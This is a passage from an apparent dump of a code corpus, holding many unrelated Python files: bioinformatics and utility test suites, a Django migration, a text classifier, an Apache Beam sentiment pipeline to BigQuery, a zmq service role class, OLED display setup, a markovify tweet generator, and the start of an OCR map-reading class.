        # run humann test (gap filling off so the pathway set is fixed)
        command = ["humann", "--input", cfg.demo_fastq, "--output", tempdir,
                   "--output-format", "biom", "--gap-fill", "off"]
        utils.run_humann(command)
        # check the output file of pathway abundance has the expected pathways
        # (pathway ids look like 'PWY-xxxx: description'; keep only the id)
        pathways_file_tsv = utils.read_biom_table(os.path.join(tempdir, "demo_pathabundance.biom"))
        pathways_found = set([x.split("\t")[0].split(":")[0] for x in filter(lambda x: "PWY" in x, pathways_file_tsv)])
        self.assertEqual(pathways_found, cfg.expected_demo_output_files_biom_pathways)
        # remove the temp directory
        utils.remove_temp_folder(tempdir)

    def test_humann_gene_families_biom_input(self):
        """
        Test the standard humann flow on a gene families output file as input
        Test with the biom format of the gene families file
        """
        # create a temp directory for output
        tempdir = utils.create_temp_folder("gene_families")
        # run humann test
        command = ["humann", "--input", cfg.demo_gene_families_biom, "--output", tempdir]
        utils.run_humann(command)
        # check the output files are as expected
        # it will include all output files except the gene families output file
        # since this file was used as input
        for expression, message in utils.check_output(cfg.expected_demo_output_files_genefamilies_input, tempdir):
            self.assertTrue(expression, message)
        # remove the temp directory
        utils.remove_temp_folder(tempdir)
|
8,153 | eb75f6e959e9153e6588a0322d1ebc75e21e73ef | # Generated by Django 2.1.2 on 2018-10-26 05:03
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make candidate.analytics_exp a FloatField
    defaulting to 0.0 (and allowing blank input)."""

    dependencies = [
        ('candidate', '0004_remove_candidate_corrected_loc'),
    ]

    operations = [
        migrations.AlterField(
            model_name='candidate',
            name='analytics_exp',
            field=models.FloatField(blank=True, default=0.0),
        ),
    ]
|
8,154 | 26df6ddf3533a8648b59f0fa2b03f89c93af7491 | import numpy as np
import pickle
import preprocessor
import pandas as pd
import sys
from scipy import spatial
class Predict:
    """Nearest-neighbour text classifier over pre-trained tf-idf vectors.

    NOTE(review): the three artifact files ('feat.npy', 'mylist.pkl',
    'vector.pkl') must exist in the working directory; they are produced
    by the training step.
    """

    def __init__(self, text):
        """
        taking the user input string
        loading trained feature numpy array
        loading the output for the numpy array
        loading the vectorizer saved during training
        :param text: raw user input to classify
        """
        self.text = text
        self.train_vec = np.load('feat.npy')
        self.train_output = pickle.load(open('mylist.pkl', 'rb'))
        self.vec = pickle.load(open('vector.pkl', 'rb'))

    def process_text(self):
        """
        creating an instance of Preprocess class
        applying clean_data function on the text
        transforming the text to tfidf array
        (result is stored on self.vec1 for compute_cosine_similarity)
        """
        prp1 = preprocessor.Preprocess()
        processed_text = prp1.clean_data(self.text)
        self.vec1 = self.vec.transform(pd.Series(processed_text))

    def compute_cosine_similarity(self):
        """
        creating an empty list for storing the cosine values
        multiplying the input vector with every row of training vector
        appending the cosine value to the list
        taking the index of maximum value of the list
        using the index to find the attribute from the output_vector
        (prints, rather than returns, the best-matching label)
        """
        cos_matrix = []
        for i in range(len(self.train_vec)):
            val = self.vec1 * self.train_vec[i]
            cos_matrix.append(val[0])
        out = np.argmax(cos_matrix)
        print(self.train_output[out])
if __name__ == '__main__':
    # Treat all command-line arguments as one input string.
    text = sys.argv[1:]
    text = ' '.join(text)
    p1 = Predict(text)
    p1.process_text()
    p1.compute_cosine_similarity()
|
8,155 | ffee0b0e00b4cebecefc3671332af3e2ffe7491b | import visgraph.dbcore as vg_dbcore
dbinfo = {
'user':'visgraph',
'password':'ohhai!',
'database':'vg_test',
}
def vgtest_basic_database():
    # NOTE: Python 2 code (print statements). Exercises DbGraphStore
    # against the database configured in `dbinfo` above.
    #vg_dbcore.initGraphDb(dbinfo)
    gstore = vg_dbcore.DbGraphStore(dbinfo)
    # Create a handful of nodes, some with extra properties
    n1 = gstore.addNode(ninfo={'name':'foo', 'size':20})
    n2 = gstore.addNode(ninfo={'name':'bar', 'size':300})
    n3 = gstore.addNode(ninfo={'name':'baz'})
    n4 = gstore.addNode(ninfo={'name':'faz'})
    n5 = gstore.addNode(ninfo={'name':'yer'})
    n6 = gstore.addNode(ninfo={'name':'mom'})
    # Chain n3 -> n4 -> n5 -> n6
    gstore.addEdge(n3, n4)
    gstore.addEdge(n4, n5)
    gstore.addEdge(n5, n6)
    # Property lookups; the third call exercises the default-value path
    print gstore.getNodeInfo(n1, 'name')
    print gstore.getNodeInfo(n1, 'size')
    print gstore.getNodeInfo(n1, 'owoot', 20)
    # Edge with properties
    eid = gstore.addEdge(n1, n2, einfo={'etype':'FooEdge'})
    print eid
    gstore.setEdgeInfo(eid, 'name', 'asdf')
    gstore.setEdgeInfo(eid, 'size', 20)
    print gstore.getEdgeInfo(eid, 'size')
    # Build a subgraph restricted to edges with size == 20
    sg = gstore.buildSubGraph()
    sg.useEdges(size=20)
    #n3 = sg.addNode(ninfo={'name':'Tom Jones'})
    #sg.addEdge(n2, n3, einfo={'etype':'FBFriend'})
    #print sg.getRefsFrom(n2)
    for eid, fromid, toid, einfo in sg.getRefsFrom(n2):
        print 'NAMES: %s -> %s' % (sg.getNodeInfo(fromid, 'name', 'unknown'), sg.getNodeInfo(toid, 'name', 'unknown'))
    sg.expandNode(n3, maxdepth=1)
|
8,156 | e40f0a25d0c02f36c254e630133dc1fb11f29d4d | from rest_framework.urlpatterns import format_suffix_patterns
from django.urls import path
from external_api import views
# Route /darksky/ to the DarkSky proxy view.
urlpatterns = [
    path('darksky/', views.DarkSkyView.as_view())
]
# Allow format suffixes (e.g. .json) on the routes above.
urlpatterns = format_suffix_patterns(urlpatterns)
|
8,157 | 87130c2bbf919cacd3d5dd823cd310dcad4dc790 | """Test suite for phlsys_tryloop."""
from __future__ import absolute_import
import datetime
import itertools
import unittest
import phlsys_tryloop
# =============================================================================
# TEST PLAN
# -----------------------------------------------------------------------------
# Here we detail the things we are concerned to test and specify which tests
# cover those concerns.
#
# Concerns:
# [ B] tryLoopDelay returns the value from the supplied 'toTry' func on success
# [ B] tryLoopDelay accepts [] for 'delays' and still calls toTry once
# [ C] tryLoopDelay ignores exceptionToIgnore until delays is empty
# [ C] tryLoopDelay re-raises exceptionToIgnore when delays is empty
# [ D] exceptions not derived from exceptionToIgnore raise through tryLoopDelay
# [ E] tryLoopDelay calls 'onException' if exceptionToIgnore is intercepted
# [ ] tryLoopDelay waits 'delay' seconds between attempts
# [ F] endless_retry makes many valid increasing delays
# [ G] short_retry makes a finite amount of valid delays
# -----------------------------------------------------------------------------
# Tests:
# [ A] test_A_Breathing
# [ B] test_B_ReturnsValue
# [ C] test_C_RetriesEachDelay
# [ D] test_D_RaiseThrough
# [ E] test_E_CallsOnException
# [ F] test_F_ValidLongIncreasingEndlessRetry
# [ G] test_G_ValidFiniteShortRetry
# =============================================================================
class Test(unittest.TestCase):
    """Unit tests for phlsys_tryloop's try_loop_delay and delay generators.

    NOTE: contains Python 2 print statements (test_E_CallsOnException).
    See the TEST PLAN comment block above for the concern/test mapping.
    """

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_A_Breathing(self):
        # Smoke test: importing the module at the top of the file suffices.
        pass

    def test_B_ReturnsResult(self):
        # [ B] try_loop_delay returns the 'toTry' result, even with no delays
        self.assertEqual(1, phlsys_tryloop.try_loop_delay(lambda: 1, []))
        self.assertEqual("hi", phlsys_tryloop.try_loop_delay(lambda: "hi", []))

    def test_C_RetriesEachDelay(self):
        # [ C] the ignored exception is retried once per delay, then re-raised
        class TestException(Exception):
            pass

        counter = []

        def failer():
            counter.append(1)
            raise TestException()

        numDelays = 4
        delays = [datetime.timedelta() for _ in range(0, numDelays)]
        try:
            phlsys_tryloop.try_loop_delay(failer, delays, TestException)
        except TestException:
            pass
        else:
            raise Exception("did not receive TestException")
        # one initial attempt plus one per delay
        self.assertEqual(1 + numDelays, len(counter))

    def test_D_RaiseThrough(self):
        # [ D] unrelated exceptions propagate immediately (no retries)
        class TestException(Exception):
            pass

        counter = []

        def failer():
            counter.append(1)
            raise TypeError()

        numDelays = 4
        delays = [datetime.timedelta() for _ in range(0, numDelays)]
        try:
            phlsys_tryloop.try_loop_delay(failer, delays, TestException)
        except TypeError:
            pass
        else:
            raise Exception("did not receive TypeError")
        self.assertEqual(1, len(counter))

    def test_E_CallsOnException(self):
        # [ E] 'onException' is invoked for every intercepted failure
        fail_counter = []
        on_exception_counter = []

        class TestException(Exception):
            pass

        def failer():
            fail_counter.append(1)
            raise TestException()

        def on_exception(e, delay):
            print e
            if delay is not None:
                print delay.total_seconds()
            on_exception_counter.append(1)

        numDelays = 4
        delays = [datetime.timedelta() for _ in range(0, numDelays)]
        try:
            phlsys_tryloop.try_loop_delay(
                failer, delays, onException=on_exception)
        except TestException:
            pass
        else:
            raise Exception("did not receive TestException")
        self.assertEqual(1 + numDelays, len(fail_counter))
        self.assertEqual(len(fail_counter), len(on_exception_counter))

    def test_F_ValidLongIncreasingEndlessRetry(self):
        # [ F] endless_retry makes many valid increasing delays
        delays = phlsys_tryloop.make_default_endless_retry()
        first_secs = None
        last_secs = None
        # sample the first 1000 delays: each must be non-negative and
        # non-decreasing, and the sequence must grow overall
        for i in itertools.islice(delays, 1000):
            secs = i.total_seconds()
            self.assertGreaterEqual(secs, 0)
            self.assertTrue(last_secs is None or secs >= last_secs)
            if first_secs is None:
                first_secs = secs
            last_secs = secs
        self.assertGreater(last_secs, first_secs)

    def test_G_ValidFiniteShortRetry(self):
        # [ G] short_retry makes a finite amount of valid delays
        is_empty = True
        for i in phlsys_tryloop.make_default_short_retry():
            is_empty = False
            secs = i.total_seconds()
            self.assertGreaterEqual(secs, 0)
            self.assertLess(secs, 3600)  # one hour is definitely not short
        self.assertFalse(is_empty)
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ------------------------------ END-OF-FILE ----------------------------------
|
8,158 | fee757b91f8c2ca1c105d7e67636772a8b5eafd5 | from logging import getLogger
from time import sleep
from uuid import UUID
from zmq import Context, Poller, POLLIN, ZMQError, ETERM # pylint: disable-msg=E0611
from zhelpers import zpipe
from dcamp.service.configuration import Configuration
from dcamp.types.messages.control import SOS
from dcamp.types.specs import EndpntSpec
from dcamp.util.decorators import runnable
@runnable
class RoleMixin(object):
    """Base class for dCAMP roles.

    A role owns a set of service threads (each reached through a zmq pipe
    socket pair) and relays STOP control commands between its caller and
    those services. State transitions (run_state/stop_state/...) come from
    the @runnable decorator.
    """

    def __init__(
            self,
            pipe,
            ep,
            uuid,
    ):
        self.ctx = Context.instance()
        self.__control_pipe = pipe  # control socket back to our caller

        assert isinstance(ep, EndpntSpec)
        self.__endpoint = ep

        assert isinstance(uuid, UUID)
        self.__uuid = uuid

        self.__config_service = None

        self.logger = getLogger('dcamp.role.%s' % self)

        # { pipe: service, ...}
        self.__services = {}

    def __str__(self):
        return self.__class__.__name__

    def __send_control_str(self, message):
        self.__control_pipe.send_string(message)

    def __recv_control(self):
        return self.__control_pipe.recv_string()

    def get_config_service(self):
        return self.__config_service

    def get_config_service_kvdict(self):
        assert self.__config_service is not None
        return self.__config_service.copy_kvdict()

    def _add_service(self, cls, *args, **kwargs):
        # Create a service of type `cls`, wiring it up over a private pipe
        # pair; the Configuration service is also remembered separately.
        pipe, peer = zpipe(self.ctx)  # create control socket pair
        # create service, passing local values along with rest of given args
        service = cls(peer, self.__endpoint, self.__uuid, self.__config_service, *args, **kwargs)
        self.__services[pipe] = service  # add to our dict, using pipe socket as key
        if Configuration == cls:
            self.__config_service = service

    def sos(self):
        # Signal distress to the caller over the control pipe.
        SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)

    def play(self):
        """Run the role: start all services, then process control commands
        until STOP (or an error) ends the loop; always clean up on exit."""
        # start each service thread
        for service in self.__services.values():
            service.start()

        # @todo: wait for READY message from each service / issue #37

        self.run_state()
        self.logger.debug('waiting for control commands')

        # listen for control commands from caller
        while self.in_running_state:
            try:
                msg = self.__recv_control()

                if 'STOP' == msg:
                    self.__send_control_str('OKAY')
                    self.logger.debug('received STOP control command')
                    self.stop_state()
                    break
                else:
                    self.__send_control_str('WTF')
                    self.logger.error('unknown control command: %s' % msg)

            except ZMQError as e:
                if e.errno == ETERM:
                    # context terminated underneath us; enter errored state
                    self.logger.debug('received ETERM')
                    self.error_state()
                    break
                else:
                    raise
            except KeyboardInterrupt:  # only for roles played by dcamp.App
                self.logger.debug('received KeyboardInterrupt')
                self.stop_state()
                break

        # role is exiting; cleanup
        return self.__cleanup()

    def __cleanup(self):
        # stop our services cleanly (if we can)
        if not self.in_errored_state:
            # @todo: this might raise an exception / issue #38
            self.__stop()

        # shared context; will be term()'ed by caller

        # close all service sockets
        for pipe in self.__services:
            pipe.close()
        del self.__services

        # close our own control pipe
        self.__control_pipe.close()
        del self.__control_pipe

        self.logger.debug('role cleanup finished; exiting')

    def __stop(self):
        """ try to stop all of this Role's services """
        # send commands
        poller = Poller()
        for (pipe, svc) in self.__services.items():
            pipe.send_string('STOP')
            self.logger.debug('sent STOP command to %s service' % svc)
            poller.register(pipe, POLLIN)

        # give services a few seconds to cleanup and exit before checking responses
        sleep(1)

        # each polling cycle waits up to 60s; allow one cycle per service
        max_attempts = len(self.__services)
        attempts = 0

        while self.__some_alive() and attempts < max_attempts:
            attempts += 1

            # poll for any replies
            items = dict(poller.poll(60000))  # wait for messages

            # mark responding services as stopped
            alive = dict(self.__services)  # make copy
            for (pipe, svc) in alive.items():
                if pipe in items:
                    reply = pipe.recv_string()
                    if 'STOPPED' == reply:
                        self.logger.debug('received STOPPED control reply from %s service' % svc)
                        svc.join(timeout=5)  # STOPPED response should be sent right before svc exit
                        if svc.is_alive():
                            self.logger.error('%s service is still alive; not waiting' % svc)
                        else:
                            self.logger.debug('%s service thread stopped' % svc)
                        poller.unregister(pipe)
                        pipe.close()
                        del (self.__services[pipe])
                    else:
                        self.logger.debug('unknown control reply: %s' % reply)

            # log some useful info
            if len(self.__services) > 0:
                msg = '%s services still alive after %d cycles; ' % (
                    [str(s) for s in self.__services.values()], attempts)
                if attempts < max_attempts:
                    msg += 'waiting'
                else:
                    msg += 'giving up'
                self.logger.debug(msg)

    def __some_alive(self):
        """returns True if at least one service of this Role is still running"""
        for service in self.__services.values():
            if service.is_alive():
                return True
        return False
|
8,159 | 93a2385d9ebdbc1a7a88185c0a0d5d1f227e46a3 | import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions,SetupOptions
from apache_beam.options.pipeline_options import GoogleCloudOptions
from apache_beam.options.pipeline_options import StandardOptions
# Pipeline configuration: GCP project, job name and GCS scratch locations.
dataflow_options = ['--project=lofty-shine-248403', '--job_name=newjob', '--temp_location=gs://testing-gcp-mandar/temp']
dataflow_options.append('--staging_location=gs://testing-gcp-mandar/staging')
options = PipelineOptions(dataflow_options)
gcloud_options = options.view_as(GoogleCloudOptions)
# Run locally.  Fix: the runner name must match a known runner class;
# 'Directrunner' is not recognized by apache_beam.runners.create_runner
# and raises ValueError at pipeline construction time.
options.view_as(StandardOptions).runner = 'DirectRunner'
# options.view_as(SetupOptions).save_main_session = True
# Reading from Pub/Sub requires a streaming pipeline.
options.view_as(StandardOptions).streaming = True
# BigQuery output schema: one row per tweet with its predicted sentiment.
table_schema = {'fields': [
    {'name': 'Tweet', 'type': 'STRING', 'mode': 'NULLABLE'},
    {'name': 'Sentiment', 'type': 'STRING', 'mode': 'NULLABLE'}
]}
def MLmodel(data):
    """Predict the sentiment of one tweet and emit a BigQuery row.

    Downloads the pickled classifier and preprocessor from GCS on every
    element (expensive; a DoFn with setup() would cache them — left as-is
    to keep the interface unchanged), runs the prediction, and returns a
    one-element list of row dicts.

    Bug fix: the original never returned anything, so the downstream
    WriteToBigQuery transform received no rows.  ParDo treats the returned
    iterable as the element's outputs.
    """
    import pickle
    from google.cloud import storage
    storage_client = storage.Client()
    bucket = storage_client.get_bucket("testing-gcp-mandar")
    # fetch and unpickle the trained classifier; 'with' closes the handles
    # the original leaked
    blob = bucket.blob("model.pkl")
    blob.download_to_filename("TwitterSA_model.pkl")
    with open("TwitterSA_model.pkl", "rb") as pickle_in:
        model = pickle.load(pickle_in)
    # fetch and unpickle the text preprocessor / vectorizer
    blob = bucket.blob("prep.pkl")
    blob.download_to_filename("TwitterSA_prep.pkl")
    with open("TwitterSA_prep.pkl", "rb") as pickle_prep:
        prep = pickle.load(pickle_prep)
    # Pub/Sub delivers bytes; decode so str(data) stores readable text
    # rather than "b'...'" (the 'decode' step upstream is commented out)
    if isinstance(data, bytes):
        data = data.decode('utf-8')
    x = prep.transform([data])
    pred = model.predict(x)
    row = {
        'Tweet': str(data),
        'Sentiment': str(pred).replace('[', '').replace(']', ''),
    }
    print([row])
    return [row]
# Assemble and run the streaming pipeline:
#   Pub/Sub (raw tweet bytes) -> sentiment prediction -> BigQuery
p = beam.Pipeline(options=options)
lines = \
(p | 'Read Data From PubSub' >> beam.io.ReadFromPubSub(subscription='projects/lofty-shine-248403/subscriptions/TweetSub').with_output_types(bytes)
# | 'decode' >> beam.Map(lambda x: x.decode('utf-8'))
| 'predict' >> beam.ParDo(MLmodel)
| 'storing in bigQ' >> beam.io.WriteToBigQuery(
schema=table_schema,
table="lofty-shine-248403:my_new_datasset.TweetLiveSentiment")
)
# For a streaming pipeline this blocks until cancelled externally.
p.run().wait_until_finish()
8,160 | d8cbed25f4c97be5a74a6e1f097fcb9fa9439a9a | import Adafruit_GPIO.SPI as SPI
import Adafruit_SSD1306
# Raspberry Pi pin configuration:
RST = 24  # reset pin (BCM numbering)
# Note the following are only used with SPI:
DC = 23  # data/command select pin
SPI_PORT = 0
SPI_DEVICE = 0
# Beaglebone Black pin configuration:
# RST = 'P9_12'
# Note the following are only used with SPI:
# DC = 'P9_15'
# SPI_PORT = 1
# SPI_DEVICE = 0
# 128x32 display with hardware I2C:
#disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)
# 128x64 display with hardware I2C:
#disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST)
# Note you can change the I2C address by passing an i2c_address parameter like:
# disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3C)
# Alternatively you can specify an explicit I2C bus number, for example
# with the 128x32 display you would use:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, i2c_bus=2)
# 128x32 display with hardware SPI:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))
# 128x64 display with hardware SPI:
# Active configuration: 128x64 SSD1306 driven over hardware SPI at 8 MHz.
disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))
# Alternatively you can specify a software SPI implementation by providing
# digital GPIO pin numbers for all the required display pins. For example
# on a Raspberry Pi with the 128x32 display you might use:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, sclk=18, din=25, cs=22)
# Initialize library.
disp.begin()
# Clear display: zero the in-memory buffer, then push it to the panel.
disp.clear()
disp.display()
8,161 | 997c1c86848b59a3986a579d5b1b50313fdfdf44 | from stats_arrays.distributions import GeneralizedExtremeValueUncertainty as GEVU
from stats_arrays.errors import InvalidParamsError
from ..base import UncertaintyTestCase
import numpy as np
class GeneralizedExtremeValueUncertaintyTestCase(UncertaintyTestCase):
    """Tests for the generalized extreme value (Gumbel) distribution wrapper.

    Fix: uses ``np.nan`` instead of the ``np.NaN`` alias, which was removed
    in NumPy 2.0.
    """

    def test_random_variables(self):
        """Median of 10k samples should fall within 5% of the analytic median."""
        params = self.make_params_array()
        params['loc'] = 2
        params['scale'] = 5
        # Formula for the Gumbel median: loc - scale * ln(ln 2)
        expected_median = 2 - 5 * np.log(np.log(2))
        results = GEVU.random_variables(params, 10000)
        found_median = np.median(results)
        self.assertEqual(results.shape, (1, 10000))
        self.assertTrue(0.95 * expected_median < found_median)
        self.assertTrue(found_median < 1.05 * expected_median)

    def test_loc_validation(self):
        """A NaN location parameter must be rejected."""
        params = self.make_params_array()
        params['loc'] = np.nan
        self.assertRaises(
            InvalidParamsError,
            GEVU.validate,
            params
        )

    def test_scale_validation(self):
        """A negative scale parameter must be rejected."""
        params = self.make_params_array()
        params['scale'] = -1
        self.assertRaises(
            InvalidParamsError,
            GEVU.validate,
            params
        )

    def test_shape_validation(self):
        """A nonzero shape parameter must be rejected (Gumbel has shape 0)."""
        params = self.make_params_array()
        params['shape'] = 1
        self.assertRaises(
            InvalidParamsError,
            GEVU.validate,
            params
        )

    def make_params_array(self, length=1):
        """Build a structured parameter array with ``length`` rows.

        Bounds default to NaN (unbounded); loc and scale get valid
        placeholder values of 1 so each test only overrides what it needs.
        """
        assert isinstance(length, int)
        params = np.zeros((length,), dtype=[
            ('input', 'u4'),
            ('output', 'u4'),
            ('loc', 'f4'),
            ('negative', 'b1'),
            ('scale', 'f4'),
            ('shape', 'f4'),
            ('minimum', 'f4'),
            ('maximum', 'f4')
        ])
        params['minimum'] = params['maximum'] = np.nan
        params['loc'] = params['scale'] = 1
        return params
|
8,162 | 80c6dd1c76b3ac56f34e36f571e8db3927994311 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Fetch screen scores with customizable search criteria
that can be tailored to match your own requirements
in tab format
"""
import requests
from core import config as cfg
screen_id = 178
request_url = cfg.BASE_URL + "/screen/" + str(screen_id)
# These parameters can be modified to match any search criteria following
# the rules outlined in the Wiki: https://wiki.thebiogrid.org/doku.php/orcs:webservice
# Here we request "tab" output with a header row and restrict the SCORE.1
# column to values between 0.9 and 0.98.
params = {
    "accesskey": cfg.ACCESS_KEY,
    "format": "tab",
    "header": "yes",
    "score1min": 0.9,
    "score1max": 0.98
}
r = requests.get( request_url, params = params )
screen = r.text.splitlines( )
# Index the result rows by gene identifier (column 1).  screen[0] is the
# header line; we could also have suppressed it with header: "no".
data = {}
for row in screen[1:]:
    # Tab files are tab delimited
    fields = row.split( "\t" )
    data[fields[1]] = fields
# Print out data about the genes BRIX1, ASB4, and NOB1
print( data['55299'] )
print( data['51666'] )
print( data['28987'] )
"""
Output as of version 1.0.1:
['178', '55299', 'gene', 'BRIX1', 'BRIX|BXDC2|FLJ11100', '9606', 'Homo sapiens', '0.94239', '0.999965', '-', '-', '-', 'NO', 'BioGRID ORCS']
['178', '51666', 'gene', 'ASB4', 'ASB-4', '9606', 'Homo sapiens', '0.97613', '0.999965', '-', '-', '-', 'NO', 'BioGRID ORCS']
['178', '28987', 'gene', 'NOB1', 'ART-4|MST158|MSTP158|NOB1P|PSMD8BP1', '9606', 'Homo sapiens', '0.96316', '0.999965', '-', '-', '-', 'NO', 'BioGRID ORCS']
"""
8,163 | 53bf97d66d0b26c6b5639acd0261604082474e7b | '''Instantiate data parsers for all cities.
If additional city parsers are added, the `bikerrawdata` instance in this file should be updated.
Written by: Anders Ohrn 2020
'''
from dataset_creators.cities import parse_taipei_file, taipei_system, \
parse_london_file, london_system, \
parse_helsiki_file, helsinki_system, \
parse_toronto_file, toronto_system
from ._bikerawdata import BikeRawData
# Global registry of raw-data handlers: one (system metadata, parser) pair
# per supported city, keyed by city label.
bikerawdata = BikeRawData()
bikerawdata.add_system(city_label='taipei', bikesharesystem_data=taipei_system)
bikerawdata.add_parser(city_label='taipei', parser_func=parse_taipei_file)
# NOTE(review): 'parse_helsiki_file' spelling comes from the imported name
# in dataset_creators.cities; rename there first if fixing the typo.
bikerawdata.add_system(city_label='helsinki', bikesharesystem_data=helsinki_system)
bikerawdata.add_parser(city_label='helsinki', parser_func=parse_helsiki_file)
bikerawdata.add_system(city_label='london', bikesharesystem_data=london_system)
bikerawdata.add_parser(city_label='london', parser_func=parse_london_file)
bikerawdata.add_system(city_label='toronto', bikesharesystem_data=toronto_system)
bikerawdata.add_parser(city_label='toronto', parser_func=parse_toronto_file)
def compile_data(city_labels=None):
    '''Compile all data into common structure.

    Not implemented yet; currently a no-op returning None.

    :param city_labels: optional iterable of city labels to restrict the
        compilation to; None means all registered cities.
    '''
    pass
def compile_and_save_data(f_out, city_labels=None):
    '''Compile and save all data.

    Not implemented yet; currently a no-op returning None.

    :param f_out: destination file path/handle for the compiled output.
    :param city_labels: optional iterable of city labels to restrict the
        compilation to; None means all registered cities.
    '''
    pass
8,164 | cc71c0cc1ec21dc465486fb5894c4d389c39bd62 | import markovify
import argparse
import sqlite3
import time
# File locations: serialized Markov model, training corpus, and the SQLite
# database that stores the generated tweets.
modelFile = './data/model.json'
corpusFile = './data/corpus.txt'
dbFile = './data/tweets.sqlite3'
def generate():
    """Generate tweets from the saved model and store them in SQLite.

    Loads the Markov model from modelFile, attempts 168 sentences of at
    most 140 characters, and inserts each non-empty result into the
    `tweets` table with the current Unix timestamp.
    """
    generate_count = 168
    # Fix: the original leaked the file object returned by open();
    # 'with' guarantees it is closed.
    with open(modelFile, 'r') as f:
        model = markovify.Text.from_json(f.read())
    conn = sqlite3.connect(dbFile)
    try:
        c = conn.cursor()
        for _ in range(generate_count):
            content = model.make_short_sentence(140)
            generated_timestamp = int(time.time())
            # make_short_sentence may return None when no sentence fits
            if content:
                c.execute('INSERT INTO tweets (content,generated_timestamp) VALUES (?,?)', (content, generated_timestamp))
                print(content)
                print(generated_timestamp)
                print('----------')
        conn.commit()
    finally:
        # Fix: close the connection even if an insert raises.
        conn.close()
def make_model():
    """Train a state-size-4 Markov model on the corpus and save it as JSON."""
    # Fix: both file handles were leaked in the original; use 'with'.
    with open(corpusFile) as f:
        corpus = f.read()
    text_model = markovify.Text(corpus, state_size=4)
    # persist the model so generate() can reuse it without retraining
    with open(modelFile, mode='w') as f:
        f.write(text_model.to_json())
def full_gen():
    """Train a fresh model from the corpus and generate tweets in one pass.

    Unlike generate(), this does not use the saved model JSON; it also
    relaxes the overlap ratio to 0.8.
    """
    # Fix: close the corpus file handle (leaked in the original).
    with open(corpusFile) as f:
        corpus = f.read()
    model = markovify.Text(corpus, state_size=4)
    generate_count = 168
    conn = sqlite3.connect(dbFile)
    try:
        c = conn.cursor()
        for _ in range(generate_count):
            content = model.make_short_sentence(140, max_overlap_ratio=.8)
            generated_timestamp = int(time.time())
            # make_short_sentence may return None when no sentence fits
            if content:
                c.execute('INSERT INTO tweets (content,generated_timestamp) VALUES (?,?)', (content, generated_timestamp))
                print(content)
                print(generated_timestamp)
                print('----------')
        conn.commit()
    finally:
        # Fix: close the connection even if an insert raises.
        conn.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--model", action="store_true", default=False, help="Create Model JSON")
parser.add_argument("--gen", action="store_true", default=False, help="Generate from stored Model")
parser.add_argument("--full", action="store_true", default=False, help="Full Geneate")
args = parser.parse_args()
if args.gen:
generate()
elif args.model:
make_model()
else:
full_gen()
|
8,165 | d3be26d56b3597a5d9e3a870b735a30d90d1e501 | import cv2
import pytesseract
import os
from PIL import Image
import numpy as np
from helper_functions import Helper
class ImageData:
    """Extracts map metadata (contour interval, scale) from a topo image.

    Much of the OCR-based extraction is disabled (commented out) and the
    public properties fall back to hard-coded estimates — see the notes on
    each accessor.
    """
    # multipliers to get portion of image with interval value
    __bottom_thresh = 0.9
    __left_thresh = 0.35
    __right_thresh = 0.65
    # (words, offset) to contour interval value: the number is expected
    # `offset` tokens after each keyword in the OCR'd word list
    __words_offsets = [("CONTOUR", 2), ("INTERVAL", 1), ("FEET", -1)]
    __resize_factor = 6
    def __init__(self, image):
        # image: BGR image array as loaded by cv2.imread — TODO confirm
        self.image = image
        # OCR pipeline disabled; properties below use fixed estimates.
        # self.sub_image = self.__get_sub_image()
        # word_list, box_list = self.__get_words()
        # self.word_list = word_list
        # self.box_list = box_list
        self._contour_interval_dist = None
        self._feet_per_pixel = None
    def __get_sub_image(self):
        """Crop, upscale and grayscale the bottom-center legend strip.

        NOTE(review): threshold_image is computed but discarded; the
        returned sub_image is the pre-threshold grayscale — confirm intent.
        """
        rows, cols, chan = self.image.shape
        sub_image = self.image[
            int(self.__bottom_thresh*rows):rows, # bottom rows
            int(self.__left_thresh*cols):int(self.__right_thresh*cols) # middle rows
        ]
        sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy=self.__resize_factor,
            interpolation = cv2.INTER_LINEAR)
        sub_image = Helper.convert_image_to_mask(sub_image)
        gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, 7, 21)
        threshold_image = cv2.threshold(gray_denoised_image,225,255,cv2.THRESH_BINARY_INV)[1]
        return sub_image
    def __get_countour_interval_dist(self):
        """Return the contour interval parsed from OCR text, or 40 if none found."""
        candidates = []
        for word, offset in self.__words_offsets:
            candidates += self.__find_candidates_for_id_and_index(self.word_list, word, offset)
        # fall back to 40 feet when OCR found no keyword/number pair
        return candidates[0][1] if len(candidates) > 0 else 40
    def __get_feet_per_pixel(self):
